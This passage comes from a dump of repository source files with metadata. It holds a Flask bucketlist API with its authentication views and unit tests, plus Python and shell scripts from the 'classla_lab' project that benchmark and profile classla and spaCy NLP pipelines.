headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Family\"})\n self.assertEqual(post_data_2.status_code, 201)\n post_data_3 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Travel\"})\n self.assertEqual(post_data_3.status_code, 201)\n post_data_4 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Adventure\"})\n self.assertEqual(post_data_4.status_code, 201)\n post_data_5 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Acts of Kindness\"})\n self.assertEqual(post_data_5.status_code, 201)\n result_of_get_method = self.client().get('/bucketlists/?limit=0',\n headers=dict(Authorization='Bearer '\n + self.token())\n )\n self.assertEqual(result_of_get_method.status_code, 200)\n self.assertIn('Zero returns no buckets', str(result_of_get_method.data))\n\n def test_over_limit(self):\n '''A method to test reading buckets with a limit that exceeds\n the number of buckets stored'''\n post_data = self.post_a_bucket()\n self.assertEqual(post_data.status_code, 201)\n post_data_2 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Family\"})\n self.assertEqual(post_data_2.status_code, 201)\n post_data_3 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Travel\"})\n self.assertEqual(post_data_3.status_code, 201)\n post_data_4 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Adventure\"})\n self.assertEqual(post_data_4.status_code, 201)\n post_data_5 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Acts of Kindness\"})\n self.assertEqual(post_data_5.status_code, 201)\n result_of_get_method = self.client().get('/bucketlists/?limit=7',\n headers=dict(Authorization='Bearer '\n + self.token())\n )\n self.assertEqual(result_of_get_method.status_code, 200)\n self.assertIn('Family', str(result_of_get_method.data))\n self.assertIn('Travel', str(result_of_get_method.data))\n self.assertIn('Climb the Himalayas', str(result_of_get_method.data))\n self.assertIn('Adventure', str(result_of_get_method.data))\n self.assertIn('Acts of Kindness', str(result_of_get_method.data))\n\n def test_edit_bucketlist(self):\n \"\"\"A method to test the editing of a bucket list\"\"\"\n post_data = self.post_a_bucket()\n self.assertEqual(post_data.status_code, 201)\n result_of_put_method = self.client().put(\n '/bucketlists/1',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n data={\n \"name\": \"The seasons will be, summer winter and autumn\"\n })\n self.assertEqual(result_of_put_method.status_code, 201)\n result_of_get_method = self.client().get('/bucketlists/1',\n headers=dict(Authorization='Bearer '\n + self.token())\n )\n self.assertIn('The seasons will b', str(result_of_get_method.data))\n\n def test_edit_bucketlist_sad_path_1(self):\n '''Test editing a bucket using a name that is already stored'''\n post_data = self.post_a_bucket()\n self.assertEqual(post_data.status_code, 201)\n result_of_put_method = self.client().put(\n '/bucketlists/1',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n data={\n \"name\": \"Climb the Himalayas\"\n })\n self.assertEqual(result_of_put_method.status_code, 409)\n\n def test_delete_bucketlist(self):\n \"\"\"A method to test the deleting of a bucket list\"\"\"\n post_data = self.post_a_bucket()\n self.assertEqual(post_data.status_code, 201)\n result_of_delete_method = self.client().delete('/bucketlists/1',\n headers=dict(Authorization='Bearer '\n + self.token())\n )\n self.assertEqual(result_of_delete_method.status_code, 200)\n response_after_removal = self.client().get('/bucketlists/1',\n headers=dict(Authorization='Bearer '\n + self.token())\n )\n self.assertEqual(response_after_removal.status_code, 400)\n\n def tearDown(self):\n '''A method for removing all set variables and deleting our database'''\n with self.app.app_context():\n db.session.remove()\n db.drop_all()\n\nif __name__ == \"__main__\":\n unittest.main()\n"
},
{
"alpha_fraction": 0.7709923386573792,
"alphanum_fraction": 0.7709923386573792,
"avg_line_length": 25.399999618530273,
"blob_id": "6479a3d46bfed34e563cb11f1097be87fceb62b8",
"content_id": "0537ed64aae4f92a038d207b0f6276f4f1bdd685",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 131,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 5,
"path": "/app/extensions/__init__.py",
"repo_name": "WinstonKamau/FLASK_API",
"src_encoding": "UTF-8",
"text": "from flask import Blueprint\n\nregistration_login_blueprint = Blueprint('auth', __name__)\n\nfrom . import views_for_register_and_login"
},
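The record above only declares the blueprint and imports its views at the bottom (a common trick to avoid circular imports). For context, here is a minimal sketch of how an app factory such as the `create_app` imported by the tests might register it; the factory body below is an assumption, not part of this repo's records:

```python
# Hypothetical app/__init__.py fragment: registering the blueprint declared
# in app/extensions/__init__.py. Config loading is omitted/assumed.
from flask import Flask

def create_app(config_name):
    app = Flask(__name__)
    # ... load configuration for config_name (assumed) ...
    from app.extensions import registration_login_blueprint
    app.register_blueprint(registration_login_blueprint)
    return app
```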
{
"alpha_fraction": 0.5818543434143066,
"alphanum_fraction": 0.5892375111579895,
"avg_line_length": 45.03268051147461,
"blob_id": "7913767b2a1aea595f934b615987f582e1911969",
"content_id": "2ed253b6521de3336bff0c90885bbd24de88dcb0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7043,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 153,
"path": "/tests/test_registration_login_token.py",
"repo_name": "WinstonKamau/FLASK_API",
"src_encoding": "UTF-8",
"text": "'''A module for testing registration, login, reset password and\nlogout\n'''\nimport unittest\nimport json\nfrom app import create_app\nfrom app import db\n\n\nclass RegistrationLoginTokenTestCase(unittest.TestCase):\n '''A class for that instantiates a client for testing and has functions\n for testing that the registration, login logout and reseting password work\n '''\n\n def setUp(self):\n '''A method to set up an instance of a client to test'''\n self.app = create_app(config_name='testing')\n self.client = self.app.test_client\n self.information = {\n 'user_email': '[email protected]',\n 'user_password': 'password'\n }\n\n with self.app.app_context():\n db.session.close()\n db.drop_all()\n db.create_all()\n\n def register_one_user(self):\n '''A method that registers one user'''\n result_of_post_method = self.client().post('/auth/register', data=self.information)\n return result_of_post_method\n\n def test_register_endpoint(self):\n '''A happy path to test registration with right information'''\n post_result = self.register_one_user()\n result = json.loads(post_result.data.decode())\n self.assertIn(\"Email and password entered correctly\", result['message'])\n self.assertEqual(post_result.status_code, 201)\n\n def test_similar_users(self):\n '''A method to test no registration when the user had been registered\n before\n '''\n post_result = self.register_one_user()\n self.assertEqual(post_result.status_code, 201)\n second_similar_post = self.register_one_user()\n result = json.loads(second_similar_post.data.decode())\n self.assertEqual(result['message'], 'The user email entered already exists!')\n self.assertEqual(second_similar_post.status_code, 409)\n\n def test_the_user_login(self):\n '''A method to thest that login works happy path and returns right variables'''\n post_result = self.register_one_user()\n self.assertEqual(post_result.status_code, 201)\n result_of_post_method = self.client().post('/auth/login', data=self.information)\n result = json.loads(result_of_post_method.data.decode())\n self.assertEqual(result['message'], 'User logged in')\n self.assertNotEqual(result['access-token'], None)\n self.assertEqual(result_of_post_method.status_code, 200)\n\n def test_non_registereduser(self):\n '''A method to test that a user cannot login with a wrong email'''\n user_data = {\n 'user_email':'[email protected]',\n 'user_password':'password'\n }\n result_of_post_method = self.client().post('/auth/login', data=user_data)\n result = json.loads(result_of_post_method.data.decode())\n self.assertEqual(result['message'],\n 'User email does not exist! 
Register or check the '\n 'user email entered again.')\n self.assertEqual(result_of_post_method.status_code, 401)\n\n def test_wrong_password(self):\n '''A method to test that a user cannot login by inserting a wrong password\n to his email address that had been registered\n '''\n post_result = self.register_one_user()\n self.assertEqual(post_result.status_code, 201)\n user_data = {\n 'user_email':'[email protected]',\n 'user_password': 'wrong_password'\n }\n result_of_post_method = self.client().post('/auth/login', data=user_data)\n result = json.loads(result_of_post_method.data.decode())\n self.assertEqual(result['message'], 'Wrong password entered for the user [email protected] !')\n self.assertEqual(result_of_post_method.status_code, 401)\n\n def test_reset_password(self):\n '''A method to test that the password is reset when all values inserted are\n right\n '''\n post_result = self.register_one_user()\n self.assertEqual(post_result.status_code, 201)\n result_of_login = self.client().post('/auth/login', data=self.information)\n self.assertEqual(result_of_login.status_code, 200)\n token = json.loads(result_of_login.data.decode())['access-token']\n reset_data = {\n 'user_password':'password',\n 'new_password':'new_test_password',\n 'verify_new_password': 'new_test_password'\n }\n result_of_post_method = self.client().post('auth/reset-password',\n headers=dict(Authorization='Bearer '+ token),\n data=reset_data\n )\n\n self.assertEqual(result_of_post_method.status_code, 201)\n self.assertIn('Password reset', str(result_of_post_method.data))\n\n def test_reset_password_sad_path(self):\n '''A method to test that the reset password does not work when the\n wrong password has been used\n '''\n post_result = self.register_one_user()\n self.assertEqual(post_result.status_code, 201)\n result_of_login = self.client().post('/auth/login', data=self.information)\n self.assertEqual(result_of_login.status_code, 200)\n token = json.loads(result_of_login.data.decode())['access-token']\n reset_data = {\n 'user_password':'wrongpassword',\n 'new_password':'new_test_password',\n 'verify_new_password': 'new_test_password'\n }\n result_of_post_method = self.client().post('auth/reset-password',\n headers=dict(Authorization='Bearer '+ token),\n data=reset_data\n )\n self.assertEqual(result_of_post_method.status_code, 400)\n self.assertIn('Wrong password entered', str(result_of_post_method.data))\n\n def test_reset_password_sad_path_1(self):\n '''A method to test that reset password cannot work when the new password\n does not match the verify new password\n '''\n post_result = self.register_one_user()\n self.assertEqual(post_result.status_code, 201)\n result_of_login = self.client().post('/auth/login', data=self.information)\n self.assertEqual(result_of_login.status_code, 200)\n token = json.loads(result_of_login.data.decode())['access-token']\n reset_data = {\n 'user_password':'password',\n 'new_password':'new_test_password',\n 'verify_new_password': 'wrong_new_test_password'\n }\n result_of_post_method = self.client().post('auth/reset-password',\n headers=dict(Authorization='Bearer '+ token),\n data=reset_data\n )\n self.assertEqual(result_of_post_method.status_code, 400)\n self.assertIn('New password and verify new password do not match',\n str(result_of_post_method.data))\n"
},
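Each reset-password test above repeats the same register -> login -> read `'access-token'` sequence. A small helper along these lines would keep that dance in one place; this is a sketch only (not repo code), assuming it is added as a method of `RegistrationLoginTokenTestCase`:

```python
# Sketch: consolidate the repeated token-acquisition boilerplate.
# Uses only names that already exist in the test case above.
import json

def login_token(self):
    """Register self.information, log in, and return the bearer token."""
    self.register_one_user()
    login_response = self.client().post('/auth/login', data=self.information)
    assert login_response.status_code == 200
    return json.loads(login_response.data.decode())['access-token']
```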
{
"alpha_fraction": 0.5375774502754211,
"alphanum_fraction": 0.5481663346290588,
"avg_line_length": 40.196807861328125,
"blob_id": "4ddf403a710117729c5d6ed3dfaf376e84bbc4b6",
"content_id": "0ecf8ca00d2ac10a8bc6b5956b8a6b7fbcf5aa47",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7744,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 188,
"path": "/app/extensions/views_for_register_and_login.py",
"repo_name": "WinstonKamau/FLASK_API",
"src_encoding": "UTF-8",
"text": "from . import registration_login_blueprint\nimport re\nfrom flask.views import MethodView\nfrom flask import make_response, request, jsonify\nfrom app.models import User\nfrom flask_bcrypt import Bcrypt\n\n\nclass Registration(MethodView):\n\n def post(self):\n user_email_status = str(request.data.get('user_email', ''))\n user_password_status = str(request.data.get('user_password', ''))\n if not user_email_status or not user_password_status:\n response = jsonify({\n 'message': \"Key variables to be entered are\"\n \"supposed to be 'user_email' and 'user_password'\"\n })\n return make_response(response), 400\n if not re.match('^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\.[a-z0-9-]+)*(\\.[a-z]{2,4})$',\n request.data['user_email']):\n response = {\n 'message': 'The user email entered is not valid ensure it has @ and .'\n }\n return make_response(jsonify(response)), 400\n if User.query.filter_by(user_email=request.data['user_email']).first():\n response = {\n 'message':'The user email entered already exists!'\n }\n return make_response(jsonify(response)), 409\n else:\n user = User.query.filter_by(user_email=request.data['user_email']).first()\n data_posted = request.data\n user_email = data_posted['user_email']\n try:\n user_password = data_posted['user_password']\n user = User(user_email=user_email, user_password=user_password)\n user.save_user()\n response = {\n 'message': 'Email and password entered correctly. Use them to log in'\n }\n return make_response(jsonify(response)), 201\n except Exception as e:\n response = {\n 'message': str(e)\n }\n return make_response(jsonify(response)), 401\n\nclass Login(MethodView):\n def post(self):\n user_email_status = str(request.data.get('user_email', ''))\n user_password_status = str(request.data.get('user_password', ''))\n if not user_email_status or not user_password_status:\n response = jsonify({\n 'message': \"Key variables to be entered are supposed to be 'user_email' and 'user_password'\"\n })\n return make_response(response), 400\n if not re.match('^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\.[a-z0-9-]+)*(\\.[a-z]{2,4})$',\n request.data['user_email']):\n response = {\n 'message': 'The user email entered is not valid ensure it has @ and .'\n }\n return make_response(jsonify(response)), 400\n if not User.query.filter_by(user_email=request.data['user_email']).first():\n response = {\n 'message': 'User email does not exist! 
Register or check the user email' \n ' entered again.'\n }\n return make_response(jsonify(response)), 401\n else:\n user = User.query.filter_by(user_email=request.data['user_email']).first()\n post_data = request.data\n if user.password_confirm(post_data['user_password']):\n token = user.create_encoded_token(user.id)\n if token:\n response = {\n 'message': 'User logged in',\n 'access-token': token.decode()\n }\n return make_response(jsonify(response)), 200\n else:\n response = {\n 'message': 'Wrong password entered for the user %s !'%(request.data['user_email'])\n }\n return make_response(jsonify(response)), 401 \n\n\n\nclass ResetPassword(MethodView):\n def post(self):\n header = request.headers.get('Authorization')\n if not header:\n response = jsonify({\n 'message': 'No authorisation header given'\n })\n return make_response(response), 401 \n if ' ' not in header:\n response= jsonify({\n 'message1': 'A space needs to exist between the Bearer and token.',\n 'message2': 'The authorization should be typed as the example below',\n 'example': 'Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE1MDMzNDUzMjIsInN1YiI6MiwiaWF0IjoxNTAzMzQxNzIyfQ.fCZ3ibX-vHQ5SKxYbrarQ0I8lvq5TgMt03A5vGlGhDE\"'\n })\n return make_response(response), 401\n user_id = User.decode_token_to_sub(header)\n if not isinstance(user_id, int):\n response = jsonify({\n 'message': 'Invalid token entered'\n })\n return make_response(response), 401\n if 'user_password' not in request.data.keys():\n response = jsonify({\n 'message': \"To reset password the variable 'user_password' for the current password needs to be inserted\"\n })\n return make_response (response), 400\n if 'new_password' not in request.data.keys():\n response = jsonify({\n 'message': \"The key 'new_password' has not been entered\"\n })\n return make_response(response), 400\n if 'verify_new_password' not in request.data.keys():\n response = jsonify({\n 'message': \"The key 'verify_new_password' has not been entered\" \n })\n return make_response(response), 400\n if not request.data.get('new_password') == request.data.get('verify_new_password'):\n response = jsonify({\n 'message': 'New password and verify new password do not match'\n })\n return make_response(response), 400 \n if not User.query.filter_by(id=user_id).first().password_confirm(request.data.get('user_password')):\n response = jsonify({\n 'message': 'Wrong password entered for the user'\n })\n return make_response(response), 400\n else:\n current_password = request.data.get('user_password')\n user = User.query.filter_by(id=user_id).first()\n new_password = request.data.get('new_password')\n verify_new_password = request.data.get ('verify_new_password')\n user.user_password = Bcrypt().generate_password_hash(new_password).decode()\n user.save_user()\n response = jsonify({\n 'user_email': user.user_email,\n 'user_password': user.user_password,\n 'message': 'Password reset'\n })\n return make_response (response), 201 \n\nclass Logout(MethodView):\n def post(self):\n '''A method to delete the token on the client's browser needs to be added\n and the response below given\n '''\n response = jsonify({\n 'message': 'Logged out'\n })\n return make_response(response), 200\n\nview_for_registration = Registration.as_view('register_view')\n\nregistration_login_blueprint.add_url_rule(\n '/auth/register',\n view_func=view_for_registration,\n methods=['POST'])\n\nview_for_login = Login.as_view('login_view')\n\nregistration_login_blueprint.add_url_rule(\n '/auth/login',\n view_func=view_for_login,\n 
methods=['POST']\n)\n\nview_for_reset_password = ResetPassword.as_view('reset_password_view')\n\nregistration_login_blueprint.add_url_rule(\n '/auth/reset-password',\n view_func=view_for_reset_password,\n methods=['POST']\n)\n\nview_for_logout = Logout.as_view('logout_view')\n\nregistration_login_blueprint.add_url_rule(\n '/auth/logout',\n view_func=view_for_logout,\n methods=['POST']\n)"
}
] | 11 |
IgorTavcar/classla_lab
|
https://github.com/IgorTavcar/classla_lab
|
05e97d13a5fcc6b43f2d270519e83c9381dc60c8
|
dd9ad3a05b1df62875ed0abd76cdad7e22df7ca6
|
b36ebc2cd1e42dbbeee83d761c03fc2cbeab2ac1
|
refs/heads/master
| 2023-08-18T13:20:00.486414 | 2021-10-03T11:49:57 | 2021-10-03T11:49:57 | 378,699,247 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7099391222000122,
"alphanum_fraction": 0.7099391222000122,
"avg_line_length": 35.51852035522461,
"blob_id": "4c236df2e13bf9aa9e20f01182a5f8140dcceb9a",
"content_id": "1b2a530188dac8bb2ad71c98517b1699d85a2941",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 986,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 27,
"path": "/scripts/profile_quick.sh",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n. \"./env/bin/activate\"\n\nexport PYTHONPATH=.\n\nPROFILE_DIR='var/bm/profiles'\n\nNOW=$(date +\"%Y%m%d_%H%M%S\")\n\nPROFILE_FILE_TOK=\"${PROFILE_DIR}/${NOW}_tok-classla.pstat\"\n\nPROFILE_FILE_POS_Q=\"${PROFILE_DIR}/${NOW}_pos-classla-q.pstat\"\nPROFILE_FILE_NER_Q=\"${PROFILE_DIR}/${NOW}_ner-classla-q.pstat\"\nPROFILE_FILE_LEM_Q=\"${PROFILE_DIR}/${NOW}_lem-classla-q.pstat\"\n\npython benchmarks/bm_tok.py --bm classla --no-report --profile \"$PROFILE_FILE_TOK\"\n\npython benchmarks/bm_pos.py --bm classla_quick --no-report --profile \"$PROFILE_FILE_POS_Q\"\npython benchmarks/bm_ner.py --bm classla_quick --no-report --profile \"$PROFILE_FILE_NER_Q\"\npython benchmarks/bm_lem.py --bm classla_quick --no-report --profile \"$PROFILE_FILE_LEM_Q\"\n\necho \"... cProfile statistics generated at: $PROFILE_FILE_TOK\"\n\necho \"... cProfile statistics generated at: $PROFILE_FILE_POS_Q\"\necho \"... cProfile statistics generated at: $PROFILE_FILE_NER_Q\"\necho \"... cProfile statistics generated at: $PROFILE_FILE_LEM_Q\"\n"
},
{
"alpha_fraction": 0.5670190453529358,
"alphanum_fraction": 0.5864693522453308,
"avg_line_length": 24.70652198791504,
"blob_id": "27ecd717123e8d9c8fc85041f67619308f10c106",
"content_id": "110430f32c7f434502d3522f6325dd77359e2756",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2365,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 92,
"path": "/benchmarks/bm_pos.py",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "import logging\n\nimport spacy\nimport torch\nfrom thinc.api import set_gpu_allocator, require_gpu\n\nimport bm\nimport classla\nimport data\nfrom measure import measure\n\nLOG = logging.getLogger('bm_pos')\n\n\n@measure\ndef bm_classla_pos_sl():\n return _classla(data.sl_size())\n\n\n@measure\ndef bm_classla_pos_100_sl():\n return _classla(100)\n\n\n@measure\ndef bm_spacy_pos_en():\n return _spacy(data.en_size())\n\n\n@measure\ndef bm_spacy_pos_100_en():\n return _spacy(100)\n\n\n@measure\ndef bm_spacy_pos_100_en_trf():\n return _spacy(100, model=bm.TRF_SPACY_MODEL)\n\n\n@measure\ndef bm_spacy_pos_en_trf():\n return _spacy(data.en_size(), model=bm.TRF_SPACY_MODEL)\n\n\n#\n\ndef _spacy(limit: int, model: str = bm.DEFAULT_SPACY_MODEL, cpu: bool = False):\n if cpu or not torch.cuda.is_available():\n spacy.require_cpu()\n else:\n set_gpu_allocator(\"pytorch\")\n require_gpu(0)\n\n nlp = spacy.load(model, exclude=['ner', 'lemmatizer'])\n n_sent = 0\n n_nouns = 0\n count = 0\n for doc in nlp.pipe(data.en()):\n n_sent += sum(1 for _ in doc.sents)\n n_nouns += sum(1 for _ in doc.noun_chunks)\n count += 1\n if (count % (limit // 10)) == 0:\n LOG.info(\"... count: {} of {}\".format(count, limit))\n if count >= limit:\n break\n return {'sentences': n_sent, 'nouns': n_nouns, 'count': count}\n\n\ndef _classla(limit: int, cpu: bool = False):\n nlp = classla.Pipeline(processors='tokenize,pos', dir=bm.CLASSLA_MODELS_DIR, lang='sl', use_gpu=not cpu)\n n_sent = 0\n n_nouns = 0\n count = 0\n for line in data.sl():\n doc = nlp(line)\n sentences = doc.sentences\n n_sent += len(sentences)\n for sent in sentences:\n n_nouns += sum(1 for token in sent.tokens if token.to_dict(['upos'])[0]['upos'] == 'NOUN')\n count += 1\n if (count % (limit // 10)) == 0:\n LOG.info(\"... count: {} of {}\".format(count, limit))\n if count >= limit:\n break\n return {'sentences': n_sent, 'nouns': n_nouns, 'count': count}\n\n\nif __name__ == '__main__':\n benchmarks = {'classla': bm_classla_pos_sl, 'classla_quick': bm_classla_pos_100_sl,\n 'spacy': bm_spacy_pos_en, 'spacy_quick': bm_spacy_pos_100_en,\n 'spacy_trf': bm_spacy_pos_en_trf, 'spacy_quick_trf': bm_spacy_pos_100_en_trf}\n bm.run(\"pos\", benchmarks)\n"
},
{
"alpha_fraction": 0.5489410161972046,
"alphanum_fraction": 0.550944447517395,
"avg_line_length": 22.608108520507812,
"blob_id": "8ebea8fc92bd73e56618e1f5d41dcbced79fee6c",
"content_id": "0f78583351499804afff71ec5ca7f375b4443bba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3494,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 148,
"path": "/benchmarks/measure.py",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "import logging\nimport os.path\nimport platform\nimport socket\nfrom dataclasses import dataclass\nfrom datetime import datetime\nfrom functools import wraps\nfrom pathlib import Path\n\nimport pandas as pd\nimport psutil\nimport time\n\nLOG = logging.getLogger('measure')\n\n\n@dataclass\nclass _Report:\n _dir = None\n _name = None\n _ctx = None\n _info = None\n _dfs = None # pending data-frames\n\n #\n\n @property\n def is_opened(self):\n return self._ctx is not None\n\n def open(self, dir_, prefix, info: dict):\n assert not self.is_opened\n\n self._dir = dir_\n self._name = prefix + self._now\n self._info = info\n self._dfs = None\n\n self._ctx = _Report._get_ctx()\n\n LOG.info(\"... opening report: {}\".format(self._path))\n\n def close(self):\n assert self.is_opened\n\n if self._dfs:\n self._flush()\n self._ctx = None\n\n #\n\n def append(self, ts, func, execution_time, results):\n assert self.is_opened\n\n if self._dfs is None:\n self._dfs = []\n\n df = dict(self._ctx)\n\n if self._info:\n df.update(self._info)\n\n df['ts'] = ts\n df['func'] = func.__name__\n df['execution-time'] = execution_time\n\n if results:\n df.update(results)\n\n self._dfs.append(df)\n\n #\n\n @property\n def _path(self) -> str:\n return os.path.join(self._dir, \"{}.csv\".format(self._name))\n\n @property\n def _now(self) -> str:\n return \"{:%Y%m%d_%H%M%S}\".format(datetime.now())\n\n def _flush(self):\n assert self._dfs is not None\n\n df = pd.DataFrame()\n df = df.append(self._dfs, ignore_index=True, sort=False)\n\n p = self._path\n os.makedirs(Path(p).parent, exist_ok=True)\n\n LOG.info(\"... writing report: {}\".format(p))\n df.to_csv(p)\n self._dfs = None\n\n @staticmethod\n def _get_ctx():\n try:\n return {'platform': platform.system(), 'platform-release': platform.release(),\n # 'platform-version': platform.version(),\n 'architecture': platform.machine(),\n 'hostname': socket.gethostname(), 'processor': platform.processor(),\n 'ram-gb': str(round(psutil.virtual_memory().total / (1024.0 ** 3))),\n 'cpu-count': psutil.cpu_count()}\n except Exception as e:\n logging.exception(e)\n\n\n_REPORT = _Report()\n\n\ndef open_report(dir_='var/bm/reports', prefix=\"report_\", info=None):\n _REPORT.open(dir_, prefix, info)\n\n\ndef close_report():\n _REPORT.close()\n\n\n#\n\ndef _report_entry(ts, func, duration, results):\n _REPORT.append(ts, func, duration, results)\n\n\n#\n\ndef measure(func):\n @wraps(func)\n def _time_it(*args, **kwargs):\n start = time.perf_counter()\n LOG.info('func: {}'.format(func.__name__))\n\n ts = int(time.time()) # ts is part of report-entry as the func invocation timestamp\n\n results = {}\n try:\n results = func(*args, **kwargs)\n except BaseException as e:\n results = {'exception': e}\n finally:\n LOG.info('func: {}, results: {}'.format(func.__name__, results))\n duration = time.perf_counter() - start\n LOG.info('func: {}, execution-time: {:.3f} sec'.format(func.__name__, duration))\n if _REPORT.is_opened:\n _report_entry(ts, func, duration, results)\n return results\n\n return _time_it\n"
},
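The measure module above is driven by `bm.run()` in practice, but its public surface is just three names. A minimal usage sketch, using only the API defined in the record (`measure`, `open_report`, `close_report`):

```python
# Decorate a benchmark, open a report so each run is appended as a CSV row,
# run the benchmark, then close the report (which writes the file).
from measure import measure, open_report, close_report

@measure
def demo_benchmark():
    total = sum(i * i for i in range(100_000))
    return {'total': total}  # returned dict entries become report columns

open_report(prefix="demo-", info={'tag': 'demo'})
demo_benchmark()  # execution time and results are appended to the report
close_report()    # flushes var/bm/reports/demo-<timestamp>.csv
```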
{
"alpha_fraction": 0.7522522807121277,
"alphanum_fraction": 0.7522522807121277,
"avg_line_length": 23.77777862548828,
"blob_id": "8cf4c4fe056969b4ff0b8a49e091e5c4240beaf7",
"content_id": "4f86433a6218fe293084e45a98cbc2efd99822b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 222,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 9,
"path": "/scripts/bm_all_trf.sh",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n. \"./env/bin/activate\"\n\nexport PYTHONPATH=.\n\npython benchmarks/bm_pos.py --bm classla spacy_trf\npython benchmarks/bm_ner.py --bm classla spacy_trf\npython benchmarks/bm_lem.py --bm classla classla_idl spacy_trf"
},
{
"alpha_fraction": 0.7686832547187805,
"alphanum_fraction": 0.7686832547187805,
"avg_line_length": 27.100000381469727,
"blob_id": "43df22c29ff3e5e2d5b7b009d3d59cde8e47ba03",
"content_id": "58bfd3c06817b23cb11f25b81b9d698c4ebfdaec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 281,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 10,
"path": "/scripts/bm_quick.sh",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n. \"./env/bin/activate\"\n\nexport PYTHONPATH=.\n\npython benchmarks/bm_tok.py\npython benchmarks/bm_pos.py --bm classla_quick spacy_quick\npython benchmarks/bm_ner.py --bm classla_quick spacy_quick\npython benchmarks/bm_lem.py --bm classla_quick classla_idl_quick spacy_quick\n"
},
{
"alpha_fraction": 0.572139322757721,
"alphanum_fraction": 0.5886194109916687,
"avg_line_length": 25.57851219177246,
"blob_id": "040531401851bb2254863b26050822b1a6b2d347",
"content_id": "de78401f1dcd7c92e20567cee565da4ca86bf0bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3216,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 121,
"path": "/benchmarks/bm_lem.py",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "import logging\n\nimport classla\nimport spacy\nimport torch\nfrom thinc.backends import set_gpu_allocator\nfrom thinc.util import require_gpu\n\nimport bm\nimport data\nfrom measure import measure\n\nLOG = logging.getLogger('bm_lem')\n\n\n@measure\ndef bm_classla_lemmas_sl():\n return _classla(data.sl_size())\n\n\n@measure\ndef bm_classla_identity_lemmas_sl():\n return _classla(data.sl_size(), identity=True)\n\n\n@measure\ndef bm_classla_lemmas_500_sl():\n return _classla(500)\n\n\n@measure\ndef bm_classla_identity_lemmas_500_sl():\n return _classla(500, identity=True)\n\n\n@measure\ndef bm_spacy_lemmas_500_en():\n return _spacy(500)\n\n\n@measure\ndef bm_spacy_lemmas_en():\n return _spacy(data.en_size())\n\n\n@measure\ndef bm_spacy_lemmas_500_en_trf():\n return _spacy(500, model=bm.TRF_SPACY_MODEL)\n\n\n@measure\ndef bm_spacy_lemmas_en_trf():\n return _spacy(data.en_size(), model=bm.TRF_SPACY_MODEL)\n\n\n#\n\ndef _spacy(limit: int, model: str = bm.DEFAULT_SPACY_MODEL, cpu: bool = False):\n if cpu or not torch.cuda.is_available():\n spacy.require_cpu()\n else:\n set_gpu_allocator(\"pytorch\")\n require_gpu(0)\n\n nlp = spacy.load(model, exclude=['ner'])\n n_sent = 0\n n_lem = 0\n count = 0\n for doc in nlp.pipe(data.en()):\n n_sent += sum(1 for _ in doc.sents)\n n_lem += sum(1 for token in doc if token.lemma_ != token.text.lower())\n count += 1\n if (count % (limit // 10)) == 0:\n LOG.info(\"... count: {} of {}\".format(count, limit))\n if count >= limit:\n break\n return {'sentences': n_sent, 'lemmas': n_lem, 'count': count}\n\n\ndef _classla(limit: int, identity=False, cpu: bool = False):\n if identity:\n nlp = classla.Pipeline(processors='tokenize,lemma', dir=bm.CLASSLA_MODELS_DIR, lang='sl',\n lemma_use_identity=True, use_gpu=not cpu)\n else:\n nlp = classla.Pipeline(processors='tokenize,pos,lemma', dir=bm.CLASSLA_MODELS_DIR, lang='sl', use_gpu=not cpu)\n\n n_sent = 0\n n_lem = 0\n count = 0\n for batch in data.sl():\n doc = nlp(batch)\n sentences = doc.sentences\n n_sent += len(sentences)\n n_lem += len(_lemmas(doc))\n count += 1\n if (count % (limit // 10)) == 0:\n LOG.info(\"... count: {} of {}\".format(count, limit))\n if count >= limit:\n break\n return {'sentences': 